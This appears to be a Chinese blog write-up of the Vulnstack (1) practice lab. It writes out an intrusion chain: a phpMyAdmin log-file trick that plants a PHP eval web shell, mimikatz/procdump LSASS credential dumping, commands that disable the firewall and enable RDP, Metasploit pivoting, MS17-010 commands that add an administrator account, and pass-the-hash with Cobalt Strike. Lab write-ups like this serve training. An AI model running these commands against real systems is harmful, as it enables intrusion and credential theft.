Vulnstack(一)

kali 192.168.224.128

win7 192.168.52.128

win2008 192.168.52.138

win2003 192.168.52.141

确保win7能通内外网,kali不能通内网,进入win7开启phpstudy,frp转到公网,80端口

图片

扫一下目录发现phpmyadmin,弱口令进后台日志包含getshell

set global general_log='on'
set global  general_log_file ="C:/phpStudy/WWW/she.php"
select "<?php eval($_POST['x'])?>"

蚁剑连上,先选择上线到cs,这里我用端口转发到我本机的2222端口了
图片

看一下内网是52网段

图片

mimikatz抓一下密码

手工抓命令:

procdump64.exe -accepteula -ma lsass.exe lsass.dmp
mimikatz.exe sekurlsa::minidump lsass.dmp
mimikatz.exe sekurlsa::logonpasswords

这里直接用cs自带的了
图片

关防火墙,开远程桌面

netsh advfirewall set allprofiles state off
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f

图片

派生一个msf会话,添加路由

meterpreter > run autoroute 192.168.52.0/24
meterpreter > run autoroute -p
Active Routing Table
====================
   Subnet             Netmask            Gateway
   ------             -------            -------
   192.168.52.0       255.255.255.0      Session 6
use auxiliary/server/socks4a 
set srvport 8082
run

然后用proxychains curl 192.168.52.143能返回就证明代理设置成功

proxychains rdesktop 192.168.52.143

在这里插入图片描述

然后进行内网探测

使用cs的net view横向探测

图片

target

图片

信息收集

net user              #查看本地用户
net localgroup        #查看本地组
net user /domain      #查看域控所有域用户
net group /domain     #查看域控组
net user /domain test         #查看域控test域用户详细信息
net group "domain users" /domain      #查看域控Domain Users组详细信息
net view /domain:god  #查看域内所有计算机
net time /domain       #查看域控时间
net view /domain       #查看域

图片

得知域控用户为owa,也就是192.168.52.138

Ladon探测一下内网主机,为2008和2003

图片

先从另一台主机入手,扫波端口发现445开着

图片

探测ms17010发现能打

图片

auxiliary/admin/smb/ms17010command,添加用户时注意密码得足够复杂

set COMMAND net user wander wdnmd@123.com /add
set COMMAND net localgroup administrators wander /add
set COMMAND 'REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f'

图片

然后这里192.168.52.138也能用这个打,但是过程一样就不重复了

在域环境中计算机登陆时候使用的大都是域账号,大量计算机在安装的时候会使用相同的本地管理员账户和密码。如果计算机的本地管理员账户密码也是相同,就可以使用哈希传递的方法对内网其他计算机进行攻击。可以通过哈希传递和明文登陆来横向获取其他机器。

其实这里三个主机的密码都是一样的,就可以用cs派生smb beacon来传递hash

SMB Beacon 使用命名管道通过父级 Beacon 进行通讯,当两个 Beacons 链接后,子 Beacon 从父 Beacon 获取到任务并发送。因为链接的 Beacons 使用 Windows 命名管道进行通信,此流量封装在 SMB 协议中,所以 SMB Beacon 相对隐蔽,绕防火墙时可能发挥奇效

新建一个listener

图片

派生一个会话,然后使用凭证登陆主机

图片

图片

命令如下

图片

用同样的方法得到另一台主机

图片

暂无评论

发送评论 编辑评论


				
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
颜文字
Emoji
小恐龙
花!
上一篇
下一篇